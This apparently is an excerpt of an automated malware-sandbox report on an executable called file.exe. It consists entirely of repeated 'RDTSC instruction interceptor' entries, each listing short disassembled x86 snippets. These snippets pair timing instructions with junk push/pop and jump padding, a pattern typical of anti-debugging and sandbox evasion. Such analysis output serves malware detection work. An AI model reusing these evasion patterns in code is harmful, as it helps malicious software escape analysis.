Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52EA98 second address: 51489F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pop edx 0x00000012 nop 0x00000013 jmp 00007F075D128EFDh 0x00000018 call dword ptr [ebp+122D282Eh] 0x0000001e jng 00007F075D128F13h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007F075D128F02h 0x0000002e jmp 00007F075D128F00h 0x00000033 push eax 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FAFB second address: 56FB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB01 second address: 56FB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB05 second address: 56FB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB09 second address: 56FB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB0F second address: 56FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F075CBABEC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FB1E second address: 56FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FC96 second address: 56FC9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FC9E second address: 56FCC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F075D128EF6h 0x00000009 jmp 00007F075D128F06h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE0D second address: 56FE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE11 second address: 56FE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE1B second address: 56FE25 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE25 second address: 56FE50 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F075D128EFDh 0x00000008 jng 00007F075D128EF6h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F075D128EFDh 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 56FE50 second address: 56FE6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576272 second address: 576279 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5766B8 second address: 5766BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57680A second address: 576811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576811 second address: 576820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F075CBABEC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B31 second address: 576B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B45 second address: 576B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B4B second address: 576B73 instructions: 0x00000000 rdtsc 0x00000002 js 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d js 00007F075D128F07h 0x00000013 jmp 00007F075D128EFBh 0x00000018 jp 00007F075D128EF6h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 576B73 second address: 576B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578D0E second address: 578D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578D14 second address: 578D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jp 00007F075CBABEDEh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578EB5 second address: 578EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F075D128EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57C23E second address: 57C246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57C246 second address: 57C24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57C24A second address: 57C259 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BAD3 second address: 57BAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128EFFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BAE7 second address: 57BB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F075CBABED4h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BC7C second address: 57BC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57BF56 second address: 57BF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jno 00007F075CBABECCh 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F075CBABED3h 0x00000014 js 00007F075CBABEC6h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5810C2 second address: 5810CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F075D128EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581229 second address: 58123D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F075CBABEC6h 0x00000008 jno 00007F075CBABEC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58123D second address: 581241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813C2 second address: 5813CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F075CBABEC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813CE second address: 5813EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F04h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813EB second address: 5813EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5813EF second address: 5813F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581828 second address: 58184C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F075CBABEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F075CBABED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58184C second address: 58185E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F075D128EFCh 0x00000008 jbe 00007F075D128EF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 589050 second address: 58905B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F075CBABEC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 589200 second address: 58921E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F075D128F04h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52E57A second address: 52E57E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5894F7 second address: 5894FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5894FB second address: 589527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F075CBABED3h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 589527 second address: 58952B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58952B second address: 58954E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F075CBABEC6h 0x00000008 js 00007F075CBABEC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push ebx 0x00000013 jmp 00007F075CBABECCh 0x00000018 pop ebx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58954E second address: 589554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C8FE second address: 58C904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C904 second address: 58C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C90C second address: 58C912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58CA59 second address: 58CA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58CE64 second address: 58CE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F075CBABEC6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59520C second address: 595219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F075D128EF6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593395 second address: 593399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593AAF second address: 593AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593AB5 second address: 593ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593ABC second address: 593ADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F075D128EFDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593ADB second address: 593AFB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F075CBABEC6h 0x00000008 jmp 00007F075CBABECAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F075CBABEDFh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593AFB second address: 593B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F03h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 593E14 second address: 593E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F075CBABEC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59410D second address: 594111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5943D3 second address: 5943F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F075CBABED2h 0x00000008 jnl 00007F075CBABEC6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5943F5 second address: 5943F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59D22E second address: 59D232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A224A second address: 5A224E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A224E second address: 5A2259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2259 second address: 5A2269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F075D128EF6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A2269 second address: 5A228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F075CBABECEh 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F075CBABECCh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A8467 second address: 5A846D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A85D6 second address: 5A85DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A85DA second address: 5A85E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A85E0 second address: 5A85E6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A8CF2 second address: 5A8D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFEh 0x00000007 jmp 00007F075D128EFCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A95D6 second address: 5A9601 instructions: 0x00000000 rdtsc 0x00000002 je 00007F075CBABECCh 0x00000008 pushad 0x00000009 jmp 00007F075CBABECFh 0x0000000e jmp 00007F075CBABECBh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5A7B6F second address: 5A7B7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F075D128EF6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AFA7D second address: 5AFAAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F075CBABEC6h 0x00000012 jmp 00007F075CBABED5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AFAAA second address: 5AFAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF662 second address: 5AF668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5AF668 second address: 5AF66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BD420 second address: 5BD424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5BCE68 second address: 5BCE82 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075D128EFEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C178D second address: 5C1791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E03DD second address: 4E03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E03E3 second address: 4E03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F075CBABEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C12D6 second address: 5C12DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C12DD second address: 5C12E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C12E3 second address: 5C1309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F075D128F04h 0x0000000c popad 0x0000000d jc 00007F075D128F16h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C1309 second address: 5C130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF541 second address: 5CF558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075D128F02h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF558 second address: 5CF560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF560 second address: 5CF566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D52A4 second address: 5D52BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABED6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D52BE second address: 5D52E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 push esi 0x00000008 jmp 00007F075D128EFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DAC83 second address: 5DAC87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D95AB second address: 5D95B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D98A3 second address: 5D98A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9A28 second address: 5D9A62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F075D128F07h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F075D128EF6h 0x00000013 jmp 00007F075D128F05h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9D21 second address: 5D9D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D9FE5 second address: 5D9FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0BCF second address: 5E0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E0868 second address: 5E086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E086C second address: 5E0872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
